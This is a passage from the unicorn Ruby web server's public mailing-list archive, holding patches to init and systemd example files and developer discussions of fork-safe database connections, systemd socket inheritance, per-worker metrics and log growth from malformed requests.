Their terms of service don't allow bots to auto-close and redirect
things, and I can't support any centralized messaging system.

> >         Anyways if you stick to old-school Usenet/mailing list posting
> >         conventions, I'm more than happy to help you :)
 
> PS. Thanks for tip on HTML vs Plain text mails. Didn't know Gmail
> could send plain text :)

I think the only problem with gmail I've heard of was from mobile
phone app users.  At least the git ML and LKML get text-only
gmail posts all the time.

Our old-school conventions mean we also trim our quotes and
avoid top-posting :)

------------8<----------------
Subject: [PATCH] examples/init.sh: update to reduce upgrade raciness
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Rework the "upgrade" target to only read the PID files once to
avoid misreading the wrong PID files in the middle of the
upgrade.

Additionally, introduce the UPGRADE_DELAY environment parameter
so users can increase/decrease according to their application
startup time.

PID files are inherently racy and people should be using a
process manager (systemd or similar) instead, but this should
mitigate most of the problems with the old target.

While we're at it, add LSB tags for systems which complain
about the lack of them and modernize things a bit using
$(command) construct instead of the more fragile `command`.

Thanks-to: Jesper Rønn-Jensen <jesperrr@gmail.com>
---
 examples/init.sh | 44 ++++++++++++++++++++++++++++++++++++--------
 1 file changed, 36 insertions(+), 8 deletions(-)

diff --git a/examples/init.sh b/examples/init.sh
index 1f0e035..4ef6cdc 100644
--- a/examples/init.sh
+++ b/examples/init.sh
@@ -1,7 +1,16 @@
 #!/bin/sh
 set -e
+### BEGIN INIT INFO
+# Provides:          unicorn
+# Required-Start:    $local_fs $network
+# Required-Stop:     $local_fs $network
+# Default-Start:     2 3 4 5
+# Default-Stop:      0 1 6
+# Short-Description: Start/stop unicorn Rack app server
+### END INIT INFO
+
 # Example init script, this can be used with nginx, too,
-# since nginx and unicorn accept the same signals
+# since nginx and unicorn accept the same signals.
 
 # Feel free to change any of the following variables for your app:
 TIMEOUT=${TIMEOUT-60}
@@ -9,21 +18,22 @@ APP_ROOT=/home/x/my_app/current
 PID=$APP_ROOT/tmp/pids/unicorn.pid
 CMD="/usr/bin/unicorn -D -c $APP_ROOT/config/unicorn.rb"
 INIT_CONF=$APP_ROOT/config/init.conf
+UPGRADE_DELAY=${UPGRADE_DELAY-2}
 action="$1"
 set -u
 
 test -f "$INIT_CONF" && . $INIT_CONF
 
-old_pid="$PID.oldbin"
+OLD="$PID.oldbin"
 
 cd $APP_ROOT || exit 1
 
 sig () {
-	test -s "$PID" && kill -$1 `cat $PID`
+	test -s "$PID" && kill -$1 $(cat $PID)
 }
 
 oldsig () {
-	test -s $old_pid && kill -$1 `cat $old_pid`
+	test -s "$OLD" && kill -$1 $(cat $OLD)
 }
 
 case $action in
@@ -45,18 +55,36 @@ restart|reload)
 	$CMD
 	;;
 upgrade)
-	if sig USR2 && sleep 2 && sig 0 && oldsig QUIT
+	if oldsig 0
+	then
+		echo >&2 "Old upgraded process still running with $OLD"
+		exit 1
+	fi
+
+	cur_pid=
+	if test -s "$PID"
+	then
+		cur_pid=$(cat $PID)
+	fi
+
+	if test -n "$cur_pid" &&
+			kill -USR2 "$cur_pid" &&
+			sleep $UPGRADE_DELAY &&
+			new_pid=$(cat $PID) &&
+			test x"$new_pid" != x"$cur_pid" &&
+			kill -0 "$new_pid" &&
+			kill -QUIT "$cur_pid"
 	then
 		n=$TIMEOUT
-		while test -s $old_pid && test $n -ge 0
+		while kill -0 "$cur_pid" 2>/dev/null && test $n -ge 0
 		do
 			printf '.' && sleep 1 && n=$(( $n - 1 ))
 		done
 		echo
 
-		if test $n -lt 0 && test -s $old_pid
+		if test $n -lt 0 && kill -0 "$cur_pid" 2>/dev/null
 		then
-			echo >&2 "$old_pid still exists after $TIMEOUT seconds"
+			echo >&2 "$cur_pid still running after $TIMEOUT seconds"
 			exit 1
 		fi
 		exit 0
-- 
EW

^ permalink raw reply related	[relevance 10%]

* Re: Dead PostgreSQL connections on worker restart
  @ 2016-04-15  5:42  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-04-15  5:42 UTC (permalink / raw)
  To: Adam Fields; +Cc: unicorn-public

Adam Fields <unicorn5958@street86.com> wrote:
> We have discovered that every time a unicorn worker is restarted,
> rails throws "PG::ConnectionBad: connection is closed” errors.

<snip>

> We are using preload: true, and have before and after fork
> rules to close and reopen the connections:

<snip>

> before_fork do |server, worker|
>  defined?(ActiveRecord::Base) and
>      ActiveRecord::Base.connection.disconnect!

<snip>

> Yet it seems that something is holding onto a dead connection
> and trying to use it. 

I'm not familiar with the Rails side anymore, so hopefully
others can chime in.  However, from the OS perspective,
it's generic and not dependent on Ruby or Pg, just *nix...

> How can we troubleshoot this?

Use lsof to determine which sockets are shared.
lsof should be available and common on most platforms,
definitely Linux-based ones.

	lsof -p $PID_OF_MASTER
	lsof -p $PID_OF_WORKER

And compare the sockets shared between the processes based on
the output of lsof.  I'm mostly going off Linux lsof output,
here, but the idea is the same across all *nixes...

Sockets marked as "LISTEN" are intended to be shared by unicorn.
(UDP and other packet-oriented sockets are fine to share, too;
 but most apps don't use them)

If your Pg connection is over TCP, look for TCP sockets
in the ESTABLISHED state and ensure each process has
a unique number in the DEVICE column (and/or local port).

Likewise if your Pg connection is over a Unix socket.  Just make
sure the path is the correct one (to distinguish from any Unix
sockets unicorn listens on).

In other words, no stream-oriented connections you make should
be shared.  There probably shouldn't be any stream-oriented
connections in your master process at all.
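
On the application side, the usual preload_app pairing looks roughly
like this (a sketch assuming ActiveRecord; adapt it to whatever Pg
client you actually use):

    # config/unicorn.rb
    preload_app true

    before_fork do |server, worker|
      defined?(ActiveRecord::Base) and
        ActiveRecord::Base.connection.disconnect!
    end

    after_fork do |server, worker|
      # each worker opens its own connection; nothing stream-oriented
      # remains shared with the master
      defined?(ActiveRecord::Base) and
        ActiveRecord::Base.establish_connection
    end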

^ permalink raw reply	[relevance 2%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor”
  2016-03-09  3:51  0%         ` Eric Wong
  2016-03-09 13:19  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” [take2] Christos Trochalakis
@ 2016-03-09 14:06  0%           ` Christos Trochalakis
  1 sibling, 0 replies; 200+ results
From: Christos Trochalakis @ 2016-03-09 14:06 UTC (permalink / raw)
  To: Eric Wong; +Cc: Amir Yalon, unicorn-public

On Wed, Mar 09, 2016 at 03:51:57AM +0000, Eric Wong wrote:
>Amir Yalon <amiryal@yxejamir.net> wrote:
>> Yes, everything looks as expected, one inherited socket starting at fd
>> number 3:
>>
>> I=[3] PID=4869 FDS=1
>>
>> Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
>> by system-wide RVM with no special options given to it.
>
>Interesting.   Can you try using some other non-Ruby daemon
>which uses sd_listen_fds, too?   I can't think of any off
>the top of my head, but I'm sure there's some.
>
>It seems like systemd is mis-setting FD_CLOEXEC on socket,
>even.
>

Ok, here is my theory: systemd correctly passes the sockets and the
environment to the process, but Amir is using rvm, which probably runs
one more exec than usual. In this extra step rvm/ruby closes the fds for
security reasons, but the ENV variables remain. In the newly forked ruby
process the timer gets fd=3 (which is now considered internal), and when
unicorn tries to examine fd=3 it breaks.
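
One way to test that theory (just a sketch) would be to point ExecStart
at a tiny wrapper like the one below instead of unicorn, so we can see
what fd 3 actually is by the time the final process runs:

    #!/usr/bin/env ruby
    # dump the systemd activation variables and check whether fd 3
    # is still a socket at this point
    warn "LISTEN_PID=#{ENV['LISTEN_PID'].inspect} LISTEN_FDS=#{ENV['LISTEN_FDS'].inspect}"
    begin
      io = IO.new(3)
      warn "fd 3 open, socket? #{io.stat.socket?}"
    rescue => e
      warn "fd 3 not usable: #{e.class}: #{e.message}"
    end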


^ permalink raw reply	[relevance 0%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor” [take2]
  2016-03-09  3:51  0%         ` Eric Wong
@ 2016-03-09 13:19  0%           ` Christos Trochalakis
  2016-03-09 14:06  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” Christos Trochalakis
  1 sibling, 0 replies; 200+ results
From: Christos Trochalakis @ 2016-03-09 13:19 UTC (permalink / raw)
  To: Eric Wong; +Cc: Amir Yalon, unicorn-public

On Wed, Mar 09, 2016 at 03:51:57AM +0000, Eric Wong wrote:
>Amir Yalon <amiryal@yxejamir.net> wrote:
>> Yes, everything looks as expected, one inherited socket starting at fd
>> number 3:
>>
>> I=[3] PID=4869 FDS=1
>>
>> Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
>> by system-wide RVM with no special options given to it.
>
>Interesting.   Can you try using some other non-Ruby daemon
>which uses sd_listen_fds, too?   I can't think of any off
>the top of my head, but I'm sure there's some.
>
>It seems like systemd is mis-setting FD_CLOEXEC on socket,
>even.
>
>> Thanks for taking the time to investigate, really appreciated.
>
>No problem.  I wonder if something else is broken in your systemd
>config...
>
>Again, I'll take a harder look at newer systemd later this week
>unless somebody beats me to it.

I was also unable to reproduce it in:

* debian stretch, ruby2.2 / systemd 229
* ubuntu wily, ruby2.{1,2} / systemd 225

I used system rubies for all the experiments, not rvm.

Amir, could you also send us, for completeness, your unicorn config
and the output of `systemctl cat unicorn.socket` and
`systemctl cat unicorn@1.service`?

^ permalink raw reply	[relevance 0%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor”
  2016-03-08 20:32  3%       ` Amir Yalon
@ 2016-03-09  3:51  0%         ` Eric Wong
  2016-03-09 13:19  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” [take2] Christos Trochalakis
  2016-03-09 14:06  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” Christos Trochalakis
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2016-03-09  3:51 UTC (permalink / raw)
  To: Amir Yalon; +Cc: unicorn-public

Amir Yalon <amiryal@yxejamir.net> wrote:
> Yes, everything looks as expected, one inherited socket starting at fd
> number 3:
> 
> I=[3] PID=4869 FDS=1
> 
> Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
> by system-wide RVM with no special options given to it.

Interesting.   Can you try using some other non-Ruby daemon
which uses sd_listen_fds, too?   I can't think of any off
the top of my head, but I'm sure there's some.

It seems like systemd is mis-setting FD_CLOEXEC on socket,
even.

> Thanks for taking the time to investigate, really appreciated.

No problem.  I wonder if something else is broken in your systemd
config...

Again, I'll take a harder look at newer systemd later this week
unless somebody beats me to it.

^ permalink raw reply	[relevance 0%]

* Re: Systemd socket inheritance fails with “not a socket file descriptor”
  @ 2016-03-08 20:32  3%       ` Amir Yalon
  2016-03-09  3:51  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Amir Yalon @ 2016-03-08 20:32 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> How many sockets are you activating? LISTEN_FDS should match
> that number.

I am “activating” only 1 socket, and the error is seen with both a TCP
and a UNIX type socket.

> Can you dump out the inherited, and LISTEN_* env variables with
> the following?

Yes, everything looks as expected, one inherited socket starting at fd
number 3:

I=[3] PID=4869 FDS=1

Also tried with Ruby 2.2.1, same results.  FWIW, my rubies are compiled
by system-wide RVM with no special options given to it.

Thanks for taking the time to investigate, really appreciated.

Regards,
Amir

^ permalink raw reply	[relevance 3%]

* Re: unicorn log attack?
  2016-01-30  9:34  0% ` unicorn log attack? Eric Wong
@ 2016-02-01  5:04  2%   ` Lawrence Pit
  0 siblings, 0 replies; 200+ results
From: Lawrence Pit @ 2016-02-01  5:04 UTC (permalink / raw)
  To: unicorn-public

Hi Eric,

> but that includes emails :)

Yeah, sorry about the email format :[  Hope this time it's as expected.

> Since the backtrace below clearly shows the error happened from
> something your application was doing;

.. if you count ruby MRI and rack as my application. ;) All this
happens way before it touches what I would call my application. But
yes, I could insert my own middleware before the first rack middleware
and deal with it.
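
Something along these lines is what I have in mind (only a sketch; the
class name is made up):

    class RescueBadEncoding
      def initialize(app)
        @app = app
      end

      def call(env)
        @app.call(env)
      rescue Rack::Utils::InvalidParameterError, ArgumentError
        # invalid %-encoding in the query string or form body
        [ 400, { 'Content-Type' => 'text/plain' }, [ "Bad Request\n" ] ]
      end
    end

    # config.ru, before any other middleware:
    #   use RescueBadEncoding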

> I don't consider it the responsibility of the app server to sanitize it.

fwiw, I agree :) ... similarly, why consider it the responsibility of
the app server to log it?  It is an application-level error, not a
unicorn error.

Rack's spec doesn't state how to deal with exceptions raised from
@app.call. Python's PEP 0333 says a bit more, along the lines that
applications should try to trap their own internal errors. I'll go
with that, then.


PS.

> In ancient times (perhaps it was the Mongrel days), the server
> itself would dump the contents of bad HTTP requests for
> debugging; but given the amount of probes/scans I saw: it wasn't
> worth it.  We don't even log things like aborted/dropped
> connections.

Yes, nice. :)

The request I'm seeing is also a bad HTTP request (invalid
%-encoding). To illustrate:

curl -v -X POST "http://localhost:8080/?foo=bar%0abaz%xx"

will have unicorn respond with a 400 Bad Request, handling
Unicorn::HttpParserError. The request doesn't enter @app.call(...),
and indeed unicorn doesn't even bother logging anything about this
request.

When sending the same thing as form data:

curl -v -X POST -d "foo=bar%0abaz%xx" "http://localhost:8080/"

then this will result in a 500 error and unicorn will log the posted
value and stacktrace (provided Rack::Request.new(env).POST is called
anywhere and @app doesn't trap its own errors):

app error: invalid %-encoding (bar%0abaz%xx)
(Rack::Utils::InvalidParameterError)


Cheers,
Lawrence

^ permalink raw reply	[relevance 2%]

* Re: unicorn log attack?
       [not found]     <56AAAD0A.8000807@icloud.com>
@ 2016-01-30  9:34  0% ` Eric Wong
  2016-02-01  5:04  2%   ` Lawrence Pit
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2016-01-30  9:34 UTC (permalink / raw)
  To: Lawrence Pit; +Cc: unicorn-public

Lawrence Pit <lawrencepit@icloud.com> wrote:
> Hi Eric,
> 
> I'm writing to you directly instead of to the unicorn-public list.

Which got your HTML email tarpitted in my spam folder instead of
being bounced back right away so you could fix it :)

> I noticed yesterday our unicorn.log files, which are usually tiny,
> were gigantic in size. Fortunately, this was caused by a friendly
> attack, but had they persisted I think we would've run out of
> diskspace (of which we would've been warned in advance, so we
> could've dealt with the situation I suppose had it happened)
> 
> Upon inspection it seems requests were received as shown below (
> I've cut out the middle part of the value that was part of the form
> body that was posted )
> 
> The log statement is printed out by unicorn.rb method +log_error+.
> 
> I'm not sure this is a unicorn issue, and thinking more an issue of
> how we developers should deal with repeatedly receiving the same
> sort of (sometimes very large) exceptions? Any advice?

Right, not a unicorn issue :)

Use logrotate or similar, compress your logs frequently, be
mindful of what you dump from your app; and watch your disk
usage (which you seem to be doing already), but that includes
emails :)

In ancient times (perhaps it was the Mongrel days), the server
itself would dump the contents of bad HTTP requests for
debugging; but given the amount of probes/scans I saw: it wasn't
worth it.  We don't even log things like aborted/dropped
connections.

Since the backtrace below clearly shows the error happened from
something your application was doing; I don't consider it the
responsibility of the app server to sanitize it.

> ps. if you want to reply via the list that's fine by me.

Done :) but I've shortened the backtrace for readability

> E, [2016-01-26T11:23:49.499928 srv23 28932] unicorn: app error:
> invalid %-encoding (stri%26%23%30%30%32%

<snip>

> [ CUT VERY LARGE VALUE ]

<snip :>

> (ArgumentError)
> /usr/local/lib/ruby/2.2.0/uri/common.rb:382:in
> `decode_www_form_component'
> /rack-1.5.5/lib/rack/utils.rb:42:in
> `unescape'
> /rack-1.5.5/lib/rack/utils.rb:105:in
> `block (2 levels) in parse_nested_query'

<snip>  These definitely aren't called from code in unicorn itself.

> /rack-1.5.5/lib/rack/urlmap.rb:50:in
> `each'
> /rack-1.5.5/lib/rack/urlmap.rb:50:in
> `call'
> /unicorn-5.0.1/lib/unicorn/http_server.rb:562:in
> `process_client'
> /unicorn-5.0.1/lib/unicorn/oob_gc.rb:70:in
> `process_client'
> /unicorn-5.0.1/lib/unicorn/http_server.rb:658:in
> `worker_loop'

^ permalink raw reply	[relevance 0%]

* [PUSHED] various documentation updates
@ 2016-01-07  3:41  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-01-07  3:41 UTC (permalink / raw)
  To: unicorn-public

* add nntp_url to the olddoc website footer
* update legacy support status for 4.x (not 4.8.x)
* update copyright range to 2016
* note all of our development tools are Free Software, too
* remove cgit mention; it may not always be cgit
  (but URLs should remain compatible).
* discourage downloading snapshot tarballs;
  "git clone" + periodic "git fetch" is more efficient
* remove most mentions of unicorn_rails as that
  was meant for ancient Rails 1.x/2.x users
* update path reference to Ruby 2.3.0
* fix nginx upstream module link to avoid redirect
* shorten Message-ID example to avoid redirects
  and inadvertent linkage
---
  Also pushed to the website http://unicorn.bogomips.org/
  (using olddoc.git @ c98abe82b6b3 from git://80x24.org/olddoc.git)

  Curious, does anybody out there use Rails 2.x or earlier?

 .olddoc.yml                       |  1 +
 Documentation/unicorn.1.txt       |  1 -
 Documentation/unicorn_rails.1.txt |  2 +-
 HACKING                           |  2 +-
 README                            | 17 +++++------------
 lib/unicorn/configurator.rb       |  5 +++--
 lib/unicorn/http_server.rb        |  4 ++--
 7 files changed, 13 insertions(+), 19 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index 063c1c6..cda8ac3 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -13,3 +13,4 @@ noindex:
 - unicorn_rails_1
 public_email: unicorn-public@bogomips.org
 private_email: unicorn@bogomips.org
+nntp_url: nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
diff --git a/Documentation/unicorn.1.txt b/Documentation/unicorn.1.txt
index efdda4b..3f20a9a 100644
--- a/Documentation/unicorn.1.txt
+++ b/Documentation/unicorn.1.txt
@@ -175,7 +175,6 @@ the unicorn config file.
 
 # SEE ALSO
 
-* unicorn_rails(1)
 * *Rack::Builder* ri/RDoc
 * *Unicorn::Configurator* ri/RDoc
 * [Unicorn RDoc][1]
diff --git a/Documentation/unicorn_rails.1.txt b/Documentation/unicorn_rails.1.txt
index bff703e..2ce7501 100644
--- a/Documentation/unicorn_rails.1.txt
+++ b/Documentation/unicorn_rails.1.txt
@@ -4,7 +4,7 @@
 
 # NAME
 
-unicorn_rails - a script/server-like command to launch the Unicorn HTTP server
+unicorn_rails - unicorn launcher for Rails 1.x and 2.x users
 
 # SYNOPSIS
 
diff --git a/HACKING b/HACKING
index 6c5f897..0fa22cd 100644
--- a/HACKING
+++ b/HACKING
@@ -57,7 +57,7 @@ Please wrap documentation at 72 characters-per-line or less (long URLs
 are exempt) so it is comfortably readable from terminals.
 
 When referencing mailing list posts, use
-"http://bogomips.org/unicorn-public/m/$MESSAGE_ID.html" if possible
+<tt>http://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
 since the Message-ID remains searchable even if a particular site
 becomes unavailable.
 
diff --git a/README b/README
index db9f0d4..11de938 100644
--- a/README
+++ b/README
@@ -13,7 +13,7 @@ both the the request and response in between unicorn and slow clients.
   {nginx}[http://nginx.org/] or {Rack}[http://rack.github.io/].
 
 * Compatible with Ruby 1.9.3 and later.
-  unicorn 4.8.x will remain supported for Ruby 1.8 users.
+  unicorn 4.x remains supported for Ruby 1.8 users.
 
 * Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
@@ -60,7 +60,7 @@ both the the request and response in between unicorn and slow clients.
 
 == License
 
-unicorn is copyright 2009 by all contributors (see logs in git).
+unicorn is copyright 2009-2016 by all contributors (see logs in git).
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
@@ -68,7 +68,7 @@ unicorn is licensed under (your choice) of the GPLv2 or later
 (GPLv3+ preferred), or Ruby (1.8)-specific terms.
 See the included LICENSE file for details.
 
-unicorn is 100% Free Software.
+unicorn is 100% Free Software (including all development tools used).
 
 == Install
 
@@ -85,10 +85,9 @@ You can get the latest source via git from the following locations
   git://bogomips.org/unicorn.git
   git://repo.or.cz/unicorn.git (mirror)
 
-You may browse the code from the web and download the latest snapshot
-tarballs here:
+You may browse the code from the web:
 
-* http://bogomips.org/unicorn.git (cgit)
+* http://bogomips.org/unicorn.git
 * http://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
@@ -102,12 +101,6 @@ In APP_ROOT, run:
 
   unicorn
 
-=== Ancient Rails 1.2 - 2.x versions
-
-In RAILS_ROOT, run:
-
-  unicorn_rails
-
 unicorn will bind to all interfaces on TCP port 8080 by default.
 You may use the +--listen/-l+ switch to bind to a different
 address:port or a UNIX socket.
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 4da19bb..948c6e3 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -181,8 +181,6 @@ def before_exec(*args, &block)
   # to have nginx always retry backends that may have had workers
   # SIGKILL-ed due to timeouts.
   #
-  #    # See http://wiki.nginx.org/NginxHttpUpstreamModule for more details
-  #    # on nginx upstream configuration:
   #    upstream unicorn_backend {
   #      # for UNIX domain socket setups:
   #      server unix:/path/to/.unicorn.sock fail_timeout=0;
@@ -192,6 +190,9 @@ def before_exec(*args, &block)
   #      server 192.168.0.8:8080 fail_timeout=0;
   #      server 192.168.0.9:8080 fail_timeout=0;
   #    }
+  #
+  # See http://nginx.org/en/docs/http/ngx_http_upstream_module.html
+  # for more details on nginx upstream configuration.
   def timeout(seconds)
     set_int(:timeout, seconds, 3)
     # POSIX says 31 days is the smallest allowed maximum timeout for select()
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ca56ed3..741cca5 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -36,7 +36,7 @@ class Unicorn::HttpServer
   # or even different installations of the same applications without
   # downtime.  Keys of this constant Hash are described as follows:
   #
-  # * 0 - the path to the unicorn/unicorn_rails executable
+  # * 0 - the path to the unicorn executable
   # * :argv - a deep copy of the ARGV array the executable originally saw
   # * :cwd - the working directory of the application, this is where
   # you originally started Unicorn.
@@ -45,7 +45,7 @@ class Unicorn::HttpServer
   # you can set the following in your Unicorn config file, HUP and then
   # continue with the traditional USR2 + QUIT upgrade steps:
   #
-  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.2.0/bin/unicorn"
+  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.3.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map(&:dup),
     0 => $0.dup,
-- 
EW

^ permalink raw reply related	[relevance 4%]

* [PATCH] examples: add systemd socket and service files
@ 2015-11-17 21:45  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-11-17 21:45 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

Since we have init scripts, we ought to have the equivalent for
systemd users, who cannot upgrade via the normal SIGUSR2 mechanism
but can use multiple services ("unicorn@1" + "unicorn@2") to
accomplish the same thing.

Based on examples by Christos Trochalakis <yatiohi@ideopolis.gr>

ref:
http://bogomips.org/unicorn-public/20150708130821.GA1361@luke.ws.skroutz.gr/
---
 examples/unicorn.socket   | 11 +++++++++++
 examples/unicorn@.service | 26 ++++++++++++++++++++++++++
 2 files changed, 37 insertions(+)
 create mode 100644 examples/unicorn.socket
 create mode 100644 examples/unicorn@.service

diff --git a/examples/unicorn.socket b/examples/unicorn.socket
new file mode 100644
index 0000000..7d5f773
--- /dev/null
+++ b/examples/unicorn.socket
@@ -0,0 +1,11 @@
+# ==> /etc/systemd/system/unicorn.socket <==
+[Unit]
+Description = unicorn sockets
+
+[Socket]
+ListenStream = 127.0.0.1:8080
+ListenStream = /tmp/path/to/.unicorn.sock
+Service = unicorn@1.service
+
+[Install]
+WantedBy = sockets.target
diff --git a/examples/unicorn@.service b/examples/unicorn@.service
new file mode 100644
index 0000000..b058da5
--- /dev/null
+++ b/examples/unicorn@.service
@@ -0,0 +1,26 @@
+# ==> /etc/systemd/system/unicorn@.service <==
+# Since SIGUSR2 upgrades do not work under systemd, this service file
+# allows starting two simultaneous services during upgrade time
+# (e.g. unicorn@1 unicorn@2) with the intention that they take
+# turns running in-between upgrades.  This should allow upgrading
+# without downtime.
+
+[Unit]
+Description = unicorn Rack application server %i
+Wants = unicorn.socket
+After = unicorn.socket
+
+[Service]
+ExecStart = /usr/bin/unicorn -c /path/to/unicorn.conf.rb /path/to/config.ru
+Sockets = unicorn.socket
+KillSignal = SIGQUIT
+User = nobody
+Group = nogroup
+ExecReload = /bin/kill -HUP $MAINPID
+
+# This is based on the Unicorn::Configurator#timeout directive,
+# adding a few seconds for scheduling differences:
+TimeoutStopSec = 62
+
+[Install]
+WantedBy = multi-user.target
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: Shared Metrics Between Workers
  @ 2015-11-13 20:54  3%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-11-13 20:54 UTC (permalink / raw)
  To: Jeff Utter; +Cc: unicorn-public

Jeff Utter <jeff.utter@firespring.com> wrote:
> On November 12, 2015 at 7:23:13 PM, Eric Wong (e@80x24.org) wrote:
> > You don't have to return all the data you'd aggregate with raindrops,  
> > though. Just what was requested.  
> 
> Just to make sure I understand this correctly though, in order for the
> metrics to be available between workers, the raindrops structs would
> need to be setup for each metric before unicorn forks? 

Yes.  But most (if not all) metrics you'd care about will need
aggregation, and thus must be known/aggregated for the lifetime
of a process, correct?
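
For example (just a sketch with made-up metric names), the counters get
created in the unicorn config before workers are forked and may be
incremented or read from any process afterwards:

    require 'raindrops'

    # created once in the master, before fork; the shared memory
    # region is inherited by every worker
    METRICS = { :requests => 0, :errors => 1 }
    COUNTERS = Raindrops.new(METRICS.size)

    # in any worker (e.g. from a middleware):
    COUNTERS.incr(METRICS[:requests])

    # from whatever reports the stats:
    COUNTERS[METRICS[:requests]]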

> > GDBM (in the stdlib), SQLite, RRD, or any "on-filesystem"[1] data store  
> > should work, even. If you do have a lot of stats; batch the updates  
> > locally (per-worker) and write them to a shared area periodically.
> 
> Are you suggesting this data store would be shared between workers or
> one per worker (and whatever displays the metrics would read all the
> stores)? I tried sharing between workers with DBM and GDBM and both of
> them end up losing metrics due to being overwritten by other threads.
> I imagine I would have to lock the file whenever one is writing, which
> would block other workers (not ideal). Out of the box PStore works
> fine for this (surprisingly). I'm guessing it does file locks behind
> the scenes.

The data in the on-filesystem store would be shared across processes.
But you'd probably want to aggregate locally in a hash before flushing
periodically.

You're probably losing data because DB file descriptors are shared
across fork.  You need to open DBs/connections after forking.  With any
DB, you can't expect to open/share open file descriptors across fork.
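
e.g. a sketch (path and naming are arbitrary), opening one GDBM store
per worker after forking so no descriptors are shared:

    after_fork do |server, worker|
      require 'gdbm'
      # a per-worker file avoids write contention between workers;
      # a reporter process can read all of them
      $stats = GDBM.new("/path/to/stats/worker.#{worker.nr}.gdbm")
    end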

You can safely share UDP sockets across fork, and likely SCTP if
implemented in the kernel (I haven't tried).  But any userland wrappers
on top of the UDP socket (e.g. statsd, as Michael mentioned) will need
to be checked for fork-friendliness.

> Right now I'm thinking that the best way to handle this would be one
> data store per worker and then whatever reads the metrics scrapes them
> all read-only. My biggest concern with this approach is knowing which
> data-stores are valid. I suppose I could put them all in a folder
> based off the parent's pid. However, would it be possible that some
> could be orphaned if a worker is killed by the master? I would need
> some way for the master to communicate to the collector (probably in a
> worker) what other workers are actively running. Is that possible?

I don't think you need to worry about all that.  You'd want stats even
for dead workers to stick around if they were running the same code as
the current worker.

OTOH, you probably want to reset/drop stats on new deploys;
so maybe key the stats based on the version of the app you're running.

I also forgot to mention I've used memcached for some stats, too.  It's
great when the data is fast-expiring, disposable and needs to be shared
across several machines, not just processes within the same host.

^ permalink raw reply	[relevance 3%]

* unicorn non-technical FAQ
@ 2015-10-14 20:12  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-10-14 20:12 UTC (permalink / raw)
  To: unicorn-public

Maybe this should be on the website somewhere, but the mailing list
archives are quite accessible nowadays.

Fwiw, I tend to follow up publicly (anonymized content) with technical
stuff to the private email address <unicorn@bogomips.org>, but never
publicly address the non-technical questions.  But some of the same
questions come up over and over, so I figure an FAQ might help.


Q: Can I use your logo?

A: What logo?  This project has never had a logo and never will.
   Logos are a waste of bandwidth, processing power, and
   yet-another potential exploitable code execution and/or
   denial-of-service vector.

   Ask the webmaster of the site you saw the logo on.


Q: Can you speak at so-and-so conference?

A: I do not speak.  Speech is synchronous and I will inevitably
   speak too fast for some, too slow for others; all while wasting
   CPU power and bandwidth to encode and distribute audio.

   Text is much more efficient as the reader can read at their
   own pace, skim over uninteresting parts, scan, etc.
   Text is far cheaper to distribute, archive and search than audio.

   Besides, unicorn has been technically obsolete since the early 90s,
   there's nothing interesting to talk about.  Read the source,
   mailing list archives, git commit history, etc. instead.


Q: May I interview you?

A: You already started :)  I have plain-text email and nothing else.

^ permalink raw reply	[relevance 2%]

* Re: Request to follow SemVer/mention it in homepage
  2015-09-29  9:26  3%   ` Jérémy Lecour
@ 2015-09-29 19:43  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-09-29 19:43 UTC (permalink / raw)
  To: Jérémy Lecour; +Cc: Pirate Praveen, unicorn-public

Jérémy Lecour <jeremy.lecour@gmail.com> wrote:
> On Tue, Sep 29, 2015 at 9:36 AM, Eric Wong <e@80x24.org> wrote:
> > Tying a Rack app to unicorn is totally, completely wrong and defeats the
> > point of Rack.
> 
> I completely agree with that statement.
> 
> However, having an app with a hard dependency on a specific app server
> is not the same as providing a default setup for a given app server.
> 
> For example, an app like Gitlab, Discourse or whatever might provide a
> good default configuration for Unicorn, a set of optimisations in the
> context of Unicorn (pre/post fork instructions…) and have something
> that works great out of the box, even if it's not restricted to
> Unicorn.

Right, Debian has Recommends/Suggests: fields for soft dependencies; but
I still consider that overkill.

> Someone who would want to change to Passenger, Puma or something else
> would have to adapt the configuration and port the optimizations, but
> the app would work the same as with Unicorn, without crippled features.
> Someone who wouldn't change or tweak anything would have good settings
> by default.

Perhaps there could be per-server Debian packages such as:

